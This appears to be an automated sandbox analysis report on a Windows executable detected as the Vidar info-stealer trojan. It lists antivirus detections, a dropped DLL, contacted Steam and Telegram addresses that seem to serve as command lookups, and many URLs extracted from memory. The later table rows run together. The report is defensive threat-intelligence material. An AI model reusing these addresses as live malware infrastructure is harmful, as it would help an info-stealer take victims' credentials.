Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Source | Detection | Scanner | Label | Link
njrtdhadawt.exe | 71% | ReversingLabs | Win32.Trojan.Vidar |
njrtdhadawt.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\chrome.dll | 75% | ReversingLabs | Win32.Trojan.Seheq |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://community.cloudflare.steamstat | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
t.me | 149.154.167.99 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://steamcommunity.com/profiles/76561199794498376 | false | | high
https://t.me/asg7rd | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://player.vimeo.com | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&amp | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://steamcommunity.com/?subsection=broadcasts | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199794498376 | 76561199794498376[1].htm.0.dr | false | | high
https://store.steampowered.com/subscriber_agreement/ | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://www.gstatic.cn/recaptcha/ | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://telegram.org/img/t_logo_2x.png | njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://www.youtube.com | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/shared/javascript/toolti | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp | false | | high
https://s.ytimg.com; | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://steam.tv/ | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://store.steampowered.com/points/shop/ | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://steamcommunity.com/profiles/76561199794498376/badges | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://sketchfab.com | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lv.queniujq.cn | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com/ | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/privacy_agreement/ | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstat | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://steamcommunity.com/Y | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t.me/zj | njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://www.google.com/recaptcha/ | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://checkout.steampowered.com/ | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=LjouqOsWbS | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png | njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://store.steampowered.com/; | njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/about/ | 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/ | njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/my/wishlist/ | njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.dr | false | | high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l= | 76561199794498376[1].htm.0.dr | false | |
                                                                                                                                high
                                                                                                                                https://web.telegram.orgnjrtdhadawt.exe, 00000000.00000003.1510994054.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://help.steampowered.com/en/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://steamcommunity.com/market/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://store.steampowered.com/news/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://docs.rs/getrandom#nodejs-es-module-supportnjrtdhadawt.exe, chrome.dll.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englisnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/profiles/76561199794498376)njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://recaptcha.net/recaptcha/;njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/discussions/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/stats/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://t.me/asg7rdU_njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://medal.tvnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://broadcast.st.dl.eccdnx.comnjrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://store.steampowered.com/steam_refunds/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=ennjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://steamcommunity.com/workshop/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://login.steampowered.com/njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/legal/njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199794498376idr7ffMozilla/5.0njrtdhadawt.exefalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://t.me/anjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFmnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://recaptcha.netnjrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://store.steampowered.com/76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://127.0.0.1:27060njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&lnjrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drfalse
                                                                                                                                                                                                          high
